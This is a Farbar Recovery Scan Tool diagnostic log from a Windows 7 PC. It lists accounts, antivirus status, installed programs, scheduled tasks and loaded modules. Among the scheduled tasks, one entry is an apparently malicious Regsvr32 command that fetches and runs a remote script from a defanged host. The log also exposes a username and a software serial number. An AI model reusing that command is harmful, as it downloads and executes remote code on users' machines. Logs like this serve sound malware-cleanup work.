Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-04-2017 01
Ran by Tomash (19-04-2017 09:30:14)
Running from D:\INSTALKI\Bezpieczenstwo
Windows 7 Home Premium Service Pack 1 (X64) (2016-08-22 16:08:41)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1673507172-2206377428-1642603207-500 - Administrator - Disabled)
Guest (S-1-5-21-1673507172-2206377428-1642603207-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1673507172-2206377428-1642603207-1003 - Limited - Enabled)
Tomash (S-1-5-21-1673507172-2206377428-1642603207-1000 - Administrator - Enabled) => C:\Users\Tomash
UpdatusUser (S-1-5-21-1673507172-2206377428-1642603207-1001 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\uTorrent) (Version: 3.4.9.43295 - BitTorrent Inc.)
7-Zip 16.02 (x64) (HKLM\...\7-Zip) (Version: 16.02 - Igor Pavlov)
7-Zip 16.04 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1604-000001000000}) (Version: 16.04.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 25.0.0.134 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated)
Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{F4BF5F6B-F695-4762-AEB2-D095A4C34D89}) (Version: 1.5.17.25482 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.5.17.25482 - Alcor Micro Corp.) Hidden
ASUS USB2.0 UVC VGA WebCam (HKLM\...\ASUS USB2.0 UVC VGA WebCam) (Version: 5.8.53120.203 - Sonix)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0001 - ASUS)
Autodesk DWG TrueView 2014 (HKLM\...\DWG TrueView 2014) (Version: 19.1.18.0 - Autodesk)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
BGS Groundhog® Desktop GSIS version 1.7.0 (HKLM\...\{9EEC0C17-19B3-4A0C-93AE-2FFB2EE570AB}_is1) (Version: 1.7.0 - BGS)
Brackets (HKLM-x32\...\{0ED76FF2-9370-4437-8C51-39F27DD0361B}) (Version: 1.8 - brackets.io)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Counter-Strike 1.6 v43 (HKLM-x32\...\{1BD2212B-8287-4F33-A6DC-903D423AB814}_is1) (Version: v43 - CSSetti.pl)
Defraggler (HKLM\...\Defraggler) (Version: 2.18 - Piriform)
Deinstalator sterownika UFR II drukarki (HKLM\...\Canon UFR II Printer Driver) (Version: 5, 4, 0, 0 - Canon Inc.)
Dexpot (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Dexpot) (Version: 1.6.14 - Dexpot GbR)
Dropbox (HKLM-x32\...\Dropbox) (Version: 23.4.19 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
DWG TrueView 2014 (Version: 19.1.18.0 - Autodesk) Hidden
e-pity 8.0.11 za rok 2016 (HKLM-x32\...\{80D8170E-5590-218-B9ED-E24E4C99A11D}_is1) (Version: 8.0.11 - e-file sp. z o.o. sp.k.)
ETDWare PS/2-x64 7.0.5.9_WHQL (HKLM\...\Elantech) (Version:  - )
f.lux (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Flux) (Version:  - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.4 - ASUS)
foobar2000 v1.3.4 (HKLM-x32\...\foobar2000) (Version: 1.3.4 - Peter Pawlowski)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 8.2.1.6871 - Foxit Software Inc.)
Free Alarm Clock (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 4.0.1.0 - Comfort Software Group)
FreeCommander XE (HKLM-x32\...\FreeCommander XE_is1) (Version:  - Marek Jasinski)
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Git version 2.9.0 (HKLM\...\Git_is1) (Version: 2.9.0 - The Git Development Community)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.19) (Version: 9.19 - Artifex Software Inc.)
Handset WinDriver 1.02.03.00 (HKLM-x32\...\Handset WinDriver) (Version: 1.02.03.00 - Huawei technologies Co., Ltd.)
HexEdit (HKLM-x32\...\{083EF76E-0760-4D7A-9508-0B88A3AF1889}) (Version: 4.0.0 - Expert Commercial Software Pty Ltd)
ImageMagick 6.9.0-3 Q16 (64-bit) (2015-02-15) (HKLM\...\ImageMagick 6.9.0 Q16 (64-bit)_is1) (Version: 6.9.0 - ImageMagick Studio LLC)
Inkscape 0.48.5 (HKLM-x32\...\Inkscape) (Version: 0.48.5 - )
IrfanView 64 (remove only) (HKLM\...\IrfanView64) (Version: 4.42 - Irfan Skiljan)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java SE Development Kit 8 Update 25 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180250}) (Version: 8.0.250.18 - Oracle Corporation)
JPEGCrops 0.7.5 beta (HKLM-x32\...\{DEAD07C6-D070-43AB-A60D-D9ABE55E296D}_is1) (Version:  - )
K-Lite Codec Pack 12.3.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.3.5 - KLCP)
LibreOffice 5.2.0.4 (HKLM-x32\...\{8FA59B7B-1D26-408F-A798-BD11A65A68B9}) (Version: 5.2.0.4 - The Document Foundation)
Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft .NET Framework 4.6 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft Money Plus (HKLM-x32\...\Money2008b) (Version: 17 - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Minecraft 1.7.9 (auto update) (HKLM-x32\...\{4A619079-D0B3-475E-8DB3-BC83A3548F72}_is1) (Version: 1.7.9 (auto update) - Mojang)
Mozilla Firefox 52.0.2 (x86 pl) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 pl)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0 - Mozilla)
Mozilla Thunderbird 52.0.1 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 52.0.1 (x86 pl)) (Version: 52.0.1 - Mozilla)
MyPublicWiFi 5.1 (HKLM-x32\...\{C08D782B-9281-406B-ABCE-326DA70B8A1F}_is1) (Version:  - TRUE Software)
NapiProjekt (2.2.0.2399) (HKLM-x32\...\NapiProjekt_is1) (Version:  - )
Nero 9 Essentials (HKLM-x32\...\{49cb6ee2-8d59-4d1d-b051-177411c7b9ec}) (Version:  - Nero AG)
Node.js (HKLM\...\{F932CDD5-CC39-4E3C-B963-2299E09DE082}) (Version: 6.10.1 - Node.js Foundation)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.2.2 - Notepad++ Team)
NVIDIA 3D Vision Driver 320.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.00 - NVIDIA Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.7 - NVIDIA Corporation)
NVIDIA Graphics Driver 320.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.00 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.24.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.24.2 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.1031 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.1031 - NVIDIA Corporation)
NVIDIA Update 1.14.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.14.17 - NVIDIA Corporation)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
PDFsam Basic (HKLM-x32\...\{AE22AC64-691E-4D7E-99CC-C517AE7F5F7D}) (Version: 3.20.2.0 - Andrea Vacondio)
PLAY ONLINE (HKLM-x32\...\PLAY ONLINE) (Version: 21.005.11.14.264 - Huawei Technologies Co.,Ltd)
Processing Modflow 5.3 (HKLM-x32\...\Processing Modflow 5.3) (Version:  - )
QGIS 2.14.5 2.14.5 Essen (HKLM\...\QGIS 2.14.5) (Version:  - QGIS Development Team)
Realtek Ethernet Controller  Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0008 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6010 - Realtek Semiconductor Corp.)
SafeZone Stable 3.55.2393.596 (x32 Version: 3.55.2393.596 - Avast Software) Hidden
Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.4.7.04 - Samsung Electronics Co., Ltd.)
Samsung SCX-4300 Series (HKLM-x32\...\Samsung SCX-4300 Series) (Version:  - Samsung Electronics CO.,LTD)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.)
Scratch 2 Offline Editor (HKLM-x32\...\edu.media.mit.Scratch2Editor) (Version: 454 - Massachusetts Institute of Technology)
Scratch 2 Offline Editor (x32 Version: 255 - Massachusetts Institute of Technology) Hidden
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
Spotify (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Spotify) (Version: 1.0.52.725.g943b26a8 - Spotify AB)
SRS Premium Sound Control Panel (HKLM\...\{E5CF6B9C-3ABE-43C9-9413-AD5FFC98F049}) (Version: 1.8.2900 - SRS Labs, Inc.)
Teigha File Converter (HKLM-x32\...\{1FF14C63-6F95-4CD7-8DBA-9FBC77A4062C}) (Version: 4.02.0 - ODA)
Universal PS x64 Multi-Lingual driver (HKLM\...\{27A1B998-6172-459E-8BFA-BC313CEFD982}) (Version: 3.1.0.0 - KONICA MINOLTA)
Vim 7.4 (self-installing) (HKLM\...\Vim 7.4) (Version:  - )
Warcraft 3 (HKLM-x32\...\Warcraft 3_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
WinSCP 5.9.4 (HKLM-x32\...\winscp3_is1) (Version: 5.9.4 - Martin Prikryl)
Wise Registry Cleaner 9.43 (HKLM-x32\...\Wise Registry Cleaner_is1) (Version: 9.43 - WiseCleaner.com, Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000_Classes\CLSID\{3faa4380-a399-11cf-a466-00805fe418f6}\InprocServer32 -> C:\Program Files\Autodesk\DWG TrueView 2014\en-US\dwgviewrficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\DWG TrueView 2014\dwgviewr.exe (Autodesk, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04EF5273-FC67-4BF7-A4BB-3D2569FB3E7D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-10] (Google Inc.)
Task: {19B090D7-001B-4F09-AEA7-A6204CADEA59} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-04] (AVAST Software)
Task: {3AB71BBE-0057-4D0A-A6CB-8ED15408E5D5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-23] (Dropbox, Inc.)
Task: {671CE90D-BF79-4C3E-A1DE-A8F5F0ABC436} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== scrobj.dll
Task: {6C9F01B6-BECC-43CD-8BE2-739CE2FBAC44} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-08-15] ()
Task: {80B3FEE7-E0B7-47B0-9E33-F05D726C5472} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-15] (Adobe Systems Incorporated)
Task: {899D8E49-5756-4C75-9B41-1E41668C3E09} - System32\Tasks\e-pity2016a_kwiecien => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [2017-02-09] (e-file sp. z o.o. sp. k.)
Task: {9251BB20-C121-482F-AEEB-2730B2ACE435} - System32\Tasks\e-pity2016a_styczen => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [2017-02-09] (e-file sp. z o.o. sp. k.)
Task: {9C19A80C-D3EC-4BEE-BDB0-F43FE242173A} - System32\Tasks\{AD4DACB7-BC30-4E87-B1E8-C5F61272F3FD} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="XM02-508X-MHAT-19WU-9Z3Z-0CH0-3U6E-85W5-MMHH-6647-1Z5L-7M8C-0U45-758P-0000"
Task: {B0DF613F-42BF-4CED-A9D6-7457A7ABFD4C} - System32\Tasks\SafeZone scheduled Autoupdate 1471882921 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {B233D4C7-4B93-430C-966E-2FE8B6BF8703} - System32\Tasks\{33FAF013-B0C3-4402-ADB7-89A951502DFB} => pcalua.exe -a C:\Users\Tomash\Downloads\KonSetup100.exe -d C:\Users\Tomash\Downloads
Task: {B8ED1AAE-4C26-47AF-8D4A-9AE28EBDEBA7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-04-13] (AVAST Software)
Task: {C6D1E418-DCD2-479F-9E92-242B6CF39C89} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: {EE66BEF9-9B83-47A1-B399-0782B2A0C19D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-10] (Google Inc.)
Task: {F248C58D-0297-43E9-8184-48E7EA3A5F97} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-23] (Dropbox, Inc.)
Task: {FBA3A804-5B14-4A96-AC0E-A46CEE585166} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {FBDE513F-985B-4358-A0B8-CC7320971199} - System32\Tasks\{AD88C4F6-17D5-441F-9D2B-6A3A880DED9D} => pcalua.exe -a "D:\INSTALKI\Office 2007\setup.exe" -d "D:\INSTALKI\Office 2007"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2016-08-22 19:12 - 2013-04-19 04:46 - 00087328 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-01 08:31 - 2008-02-06 01:54 - 00022016 _____ () C:\Windows\System32\sse1ml6.dll
2017-01-25 19:03 - 2013-04-03 15:09 - 00756224 _____ () C:\Program Files (x86)\MyPublicWiFi\PublicWiFiService.exe
2016-09-01 08:34 - 2016-08-17 13:43 - 00499000 ____N () C:\Windows\SysWOW64\spdsvc.exe
2017-04-18 22:11 - 2017-03-22 10:24 - 02271520 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-04-18 22:11 - 2017-03-23 19:40 - 02267600 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-04-04 17:11 - 2017-04-04 17:11 - 00162024 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll
2017-04-04 17:12 - 2017-04-04 17:12 - 00790544 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll
2017-04-04 17:12 - 2017-04-04 17:12 - 00275776 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll
2016-08-22 18:58 - 2009-12-10 00:39 - 00402024 _____ () C:\Windows\system32\nvshell.dll
2016-11-27 19:55 - 2016-11-27 19:55 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00514048 _____ () C:\Program Files (x86)\PLAY ONLINE\PLAY ONLINE.exe
2016-08-22 18:11 - 2016-08-22 18:11 - 00246112 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\ouc.exe
2017-04-04 17:12 - 2017-04-04 17:12 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-04-04 17:12 - 2017-04-04 17:12 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-18 21:07 - 2017-04-18 21:07 - 06021752 _____ () C:\Program Files\AVAST Software\Avast\defs\17041812\algo.dll
2017-04-04 17:12 - 2017-04-04 17:12 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-04-04 17:12 - 2017-04-04 17:12 - 00230632 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2016-08-22 18:19 - 2016-08-22 18:19 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-04 17:11 - 2017-04-04 17:11 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2017-04-15 21:58 - 2017-04-14 01:30 - 00870720 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_watchdog.dll
2017-04-15 21:58 - 2017-03-20 20:10 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2017-04-15 21:58 - 2017-03-20 20:10 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2017-04-15 21:58 - 2017-03-20 20:10 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00020824 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2017-04-15 21:58 - 2017-03-20 20:11 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2017-04-15 21:58 - 2017-03-20 20:10 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 01729360 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2017-04-15 21:58 - 2017-03-20 20:10 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2017-04-15 21:58 - 2017-03-20 20:11 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2017-04-15 21:58 - 2017-03-20 20:10 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2017-04-15 21:58 - 2017-03-20 20:13 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00022864 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00060736 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00038712 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2017-04-15 21:58 - 2017-03-20 20:10 - 00392656 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2017-04-15 21:58 - 2017-03-20 20:13 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00392512 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00246608 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00027488 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2017-04-15 21:58 - 2017-03-20 20:12 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00022336 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00025432 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 01826104 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2017-04-15 21:58 - 2017-03-20 20:11 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 01972024 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 03928896 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00171336 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00042816 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00531264 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00133432 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
